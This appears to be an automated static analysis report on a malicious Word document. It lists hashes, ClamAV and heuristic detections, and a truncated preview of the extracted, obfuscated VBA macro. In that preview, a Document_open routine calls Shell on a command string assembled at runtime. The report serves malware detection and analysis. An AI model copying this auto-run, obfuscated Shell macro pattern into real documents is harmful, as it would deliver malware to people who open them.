Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7cdc0a088a8a4a7c…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 383.8 KB
Created: 2018-07-19 22:01:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: 4444789cdb956740588fe398c498b7d8
SHA-1: 69934b7390586c7e997715d6035934209bcbb354
SHA-256: 7cdc0a088a8a4a7c32def02e9c277afdf26bea37ae61390cd21aadfee895d32b
Risk Score: 182

Malware Insights

MITRE ATT&CK

  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

The sample is an Office document containing VBA macros. A critical heuristic fired on a Shell() call within the VBA code, indicating that the macro attempts to execute external commands. The ClamAV detection name 'Doc.Malware.Valyria-6744893-0' further confirms its malicious nature. The macro's primary function appears to be executing a shell command, likely to download and execute a second-stage payload, which is a common malware delivery technique. The command string itself is assembled at runtime from many concatenated variables, so it is not readable in the static preview below.

Heuristics (5)

  • ClamAV: Doc.Malware.Valyria-6744893-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6744893-0
  • VBA macros detected [medium] (2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 57073 bytes
SHA-256: efd69becae3e381584d61a6634bc2e52ff2aa61885908ff9078309764fee254b
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "CMhRuMUYwz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function tpUwMNTwZlvM()
On Error Resume Next
   UhwzCk = CPfplF - HQoWEG + 94882 + 69231 * jsODiH + ozkOZ - 84064 * wPzVt / iARiBS * Zmaqpk
   hiRfl = iZrKnw - GUzCO + 86653 + 42596 * hnljH + dUidz - 91029 * ztHwBu / jHFiq * PlQlw
   IiIqw = AKBXw - LXPIo + 89313 + 70453 * aKJBJm + fSwmLv - 46266 * zphFDb / WVqPum * WulGf
   WkBHBM = aQwiA - oEaizY + 4584 + 38588 * vdsTm + umhYm - 99621 * wPsFzZ / YVPMP * twHzoQ
   UHjLiU = ElmSnc - THojX + 71393 + 77841 * KtrwWv + AEQYz - 55894 * BtZGwS / DwHJqD * wZIOIf
   Ezqjwd = FEIhqB - JarFMw + 1698 + 50623 * iCqns + EzjSCa - 95755 * bzXDQ / zXspiG * Yfjjr
   FojDv = qrArW - HpGFk + 6856 + 83767 * fajCL + kCXuY - 78103 * qtbSRw / oJQqfD * jjVFls
   oYOiZ = jiRJNw - GLlsZ + 56064 + 2193 * aNjDHT + ijkWnV - 19035 * iXZbmu / GwQWm * WFPnKX
End Function
Private Function UuczhadE()
On Error Resume Next
   ulOUl = FhdiTt - OQKaj + 93015 + 1862 * oKUTU + wlVdl - 14645 * FrwUk / cJzKz * VrKLTt
   cXOSC = VGUdK - IILlfw + 9941 + 61091 * sErYlA + ooITWi - 75960 * GAlzsl / nlfZdl * QzCzUj
   sAZsQ = jVnRiS - ccMjTV + 57327 + 86705 * nkpBG + swZpiE - 29691 * SNDOp / fVhCI * UUrKjS
   WGbtAR = IvIEh - uIYOFw + 73386 + 47562 * ozVmwU + aCkEbz - 99290 * CUTnT / rGRva * mwNvvH
   MoCOs = cosojh - PuVQG + 76957 + 66497 * RCntGQ + HPGQo - 92600 * dLpWr / qdsSam * aVtdi
End Function
Private Function IisjUnUGShT()
On Error Resume Next
   TDYnl = GaNzF - ikLNE + 87568 + 7112 * BwiXq + XfSjJd - 35792 * QoUPMX / aVNlB * OCLaY
   rFhwHO = hfzAa - VkXaH + 51302 + 44974 * zUIlr + bwNwpT - 89184 * zrzHE / iDqSO * ndwUY
   imTFEU = JpWIi - WCpnv + 18871 + 6689 * TnZRS + oKXzk - 36822 * BimjoS / USIjC * RSQfl
   VtkYL = mhkRA - HIGmj + 54971 + 98795 * Orudq + Vowwt - 45846 * EZVNSm / SbtlqG * NhqRs
   IWYBz = oaHjo - nwTWto + 64256 + 62227 * aaRmo + IcHFl - 12238 * YtPSR / ioSpZ * NVujR
   hKwtn = UhzSYY - MUTDG + 13420 + 83678 * tBfpPz + WtrLaF - 11888 * jssCzj / AjLrH * wNZiRb
End Function
Private Function QWrRfVqYaUjfiM()
On Error Resume Next
   azrndc = FRYfK - luGLpb + 77185 + 80529 * jWVWbA + VvVFl - 83640 * LSmNQG / vFqtX * FSdzSv
   EmiwSS = LlRPAz - tXAdM + 66253 + 37458 * tobUF + rnsdEk - 73043 * AQbFh / KTYcl * fCiRz
   LGRFsM = sNYKR - NDLjG + 41548 + 51223 * UHSvH + IEwllu - 19526 * dCRBD / zEGKY * NRVwXq
   VSHAW = vdJEFu - vtCNX + 68641 + 15422 * QfcEDQ + RXnpu - 30913 * AfMuXZ / wlocj * YajuM
   rwzKlN = nRmZX - EZJSF + 33865 + 51126 * QAHWH + rizOuM - 44772 * fCGPq / LmTkBl * rMiSZ
End Function
Private Sub Document_open()
On Error Resume Next
   BDflI = jBnisB - ZjcVlu + 51080 + 15492 * BfbPjm + PzRhp - 10746 * kHlzdO / zsbkZ * bEzmSM
   aBLKO = zWNhwE - QdGRI + 6495 + 23486 * diXsuF + rTCnt - 21572 * YZmism / lmTDPo * dYpoJ
   ToRTtp = tiJKKn - jidKZ + 68731 + 84224 * DpfQzN + MwjWfF - 70864 * KzzOr / KsEBG * tLdkFF
Shell "" + KtItwYjbTzTDrO + wtbBnzfKvbKziP + CVar("c") + alwsrkQ + QHkFnkqzr + dTUEFJT + LaJnrfIm + YPpzwPPWafm + rjIINJIto + COCXnlTiBTj + lPVYKWKHB + SZcHXNzpic + cQFtNUhdIh + hFUdzvDjV + lhGmrzoZvi + iabbLYBc + uZiXLKJz + tzOiPYpI + itimN + EHiVnzz + Vlpjw + YzPoj + MKVXFifJSi + fMFrhkNiGKN + jSEsKUiBUB + JcGIqzXK + mKVjUU + OPzzzRK + qSsfE + AohbhUC + tikbSiDUT + ocrRzRKboIw + TKbVAosz, 0
   VCVXQ = ODSrL - RWDCv + 50696 + 26759 * FCZji + SHmiU - 46779 * tSiVqz / qlLWPA * LnPRT
   rQBBU = QZizsV - GwspA + 32681 + 31472 * HAjsTI + FisfON - 99089 * zQpbX / QwRznV * IzsjK
   QRJBqj = zGNHJ - wuYKp + 86229 + 18383 * ESujnL + jAzErO - 70015 * HolqOQ / EpdObO * hrRNtM
End Sub
Private Function cjzHipTVRwdFk()
On Error Resume Next
   SObKC = wlUcw - WYKBu + 81260 + 96110 * BNDrdX + FdkZvc - 24677 * iXLAb / rVVSk * hTzCJ
   WrOiKo = oHbBm - hwdFp + 8766 + 37622 * kaFOJ + QGuMPw - 33553 * Ujsdq / iWHkj * cAjli
   qqzSRD = YKCowT - dhjUl + 27551 + 3346
... (truncated)